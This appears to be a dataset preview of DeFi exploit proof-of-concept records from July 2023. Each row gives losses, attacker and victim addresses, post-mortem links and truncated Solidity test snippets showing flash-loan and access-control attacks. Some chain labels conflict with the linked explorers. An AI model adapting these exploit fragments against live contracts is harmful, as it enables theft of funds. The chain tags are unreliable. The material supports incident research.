// @KeyInfo - Total Lost : ~3.25M USD$
// Attacker : https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
// Attack Contract : https://etherscan.io/address/0x743599ba5cfa3ce8c59... | exploit_poc | Conic | 2023-07 | Conic_exp.sol | flash_loan | 8c6190ff8008f2fe | 2026-01-07T10:59:16.510670 | postmortems | ethereum | 17,740,954 | ~3.25M USD$ | 3,250,000 | https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa | https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb | https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9 | https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/BlockSecTeam/status/1682356244299010049 | true | true | true | critical | ~3.25M USD$ | flash-loan | false | ~3.25M USD$ | https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa | https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb | https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9 | https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/BlockSecTeam/status/1682356244299010049 | $3.25M | 8 | high | Conic Exploit (2023-07) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$69K
// Attacker : https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
// Vulnerable Contract : https://etherscan.io/address/0x8189afbe7b0e81dae735e... | exploit_poc | AzukiDAO | 2023-07 | AzukiDAO_exp.sol | null | 127e1af9046f6f94 | 2026-01-07T10:59:16.510750 | postmortems | ethereum | 17,593,308 | ~$69K | 69,000 | https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e | null | https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb | https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34 | null | null | true | true | false | medium | ~$69K | unknown | function testExploit() public {
deal(address(Bean), azukiDAOExploiter, 0);
emit log_named_decimal_uint(
"Attacker balance of Bean token before exploit", Bean.balanceOf(azukiDAOExploiter), Bean.decimals()
);
// Arguments for the claim() function calls
// Signature: sen... | true | ~$69K | https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e | https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb | https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34 | $69.0K | 7.71 | medium | AzukiDAO Exploit (2023-07) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~51K USD$
// Attacker : https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
// Attack Contract : https://snowtrace.io/address/0x16a3c9e492dee1503f46d... | exploit_poc | Platypus02 | 2023-07 | Platypus02_exp.sol | flash_loan | 90c58fba4a879141 | 2026-01-07T10:59:16.510796 | postmortems | polygon | 32,470,736 | ~51K USD$ | 51,000 | https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a | https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6 | null | https://twitter.com/peckshield/status/1678800450303164431 | true | true | true | medium | ~51K USD$ | flash-loan | function testExploit() public {
aaveV3.flashLoanSimple(address(this), address(USDC), 85_000 * 1e6, new bytes(0), 0);
emit log_named_decimal_uint(
"Attacker USDC balance after exploit", USDC.balanceOf(address(this)), USDC.decimals()
);
} | true | ~51K USD$ | https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a | https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6 | https://twitter.com/peckshield/status/1678800450303164431 | $51.0K | 8.93 | high | Platypus02 Exploit (2023-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~165K USD$
// Attacker : https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
// Attack Contract : https://etherscan.io/address/0xf466f9f431aea853040e... | exploit_poc | Civfund | 2023-07 | Civfund_exp.sol | access_control | 01b9234cd11181e5 | 2026-01-07T10:59:16.510868 | postmortems | ethereum | 17,646,141 | ~165K USD$ | 165,000 | https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 | https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2 | https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826 | https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b | null | null | true | true | true | high | ~165K USD$ | access-control | function testExploit() public {
// Step 1. Call vulnerable contract function which have no access controll
for (uint256 i; i < victims.length; ++i) {
callVulnerableContract();
}
emit log_named_decimal_uint(
"Attacker USDT balance after exploit", USDT.balanceOf(ad... | true | ~165K USD$ | https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 | https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2 | https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826 | https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b | $165.0K | 10 | high | Civfund Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~110K USD$
// Attacker : https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
// Attack Contract : https://bscscan.com/address/0xb31c7b7bdf69554345e47a... | exploit_poc | FFIST | 2023-07 | FFIST_exp.sol | null | 19e4ade56729c83e | 2026-01-07T10:59:16.510935 | postmortems | bsc | 30,113,117 | ~110K USD$ | 110,000 | https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 | https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb | https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347 | https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0 | null | https://twitter.com/Phalcon_xyz/status/1681869807698984961 | true | true | false | high | ~110K USD$ | unknown | false | ~110K USD$ | https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 | https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb | https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347 | https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0 | https://twitter.com/Phalcon_xyz/status/1681869807698984961 | $110.0K | 5.52 | medium | FFIST Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~8K USD$
// Attacker : https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
// Attack Contract : https://bscscan.com/address/0x9be508ce41ae5795e1ebc247... | exploit_poc | SUT | 2023-07 | SUT_exp.sol | flash_loan | 585115a15cecd62f | 2026-01-07T10:59:16.510978 | postmortems | bsc | 30,165,901 | ~8K USD$ | 8,000 | https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 | https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db | https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37 | https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae | null | null | true | true | true | low | ~8K USD$ | flash-loan | function testExploit() public {
// Start with 0 BNB
deal(address(this), 0 ether);
// Take 10 WBNB loan
DPPOracle.flashLoan(10e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.... | true | ~8K USD$ | https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 | https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db | https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37 | https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae | $8.0K | 8.85 | high | SUT Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~400K USD$
// Attacker : https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
// Attack Contract : https://optimistic.etherscan.io/address/... | exploit_poc | ArcadiaFi | 2023-07 | ArcadiaFi_exp.sol | flash_loan | ecd73db8a518479e | 2026-01-07T10:59:16.511032 | postmortems | ethereum | 106,676,494 | ~400K USD$ | 400,000 | https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 | https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6 | https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109 | https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe | https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0 | https://twitter.com/Phalcon_xyz/status/1678250590709899264 | true | true | true | high | ~400K USD$ | flash-loan | false | ~400K USD$ | https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 | https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6 | https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109 | https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe | https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0 | https://twitter.com/Phalcon_xyz/status/1678250590709899264 | $400.0K | 8 | high | ArcadiaFi Exploit (2023-07) | true | true | true | true |
End of preview. Expand in Data Studio
No dataset card yet
- Downloads last month
- 5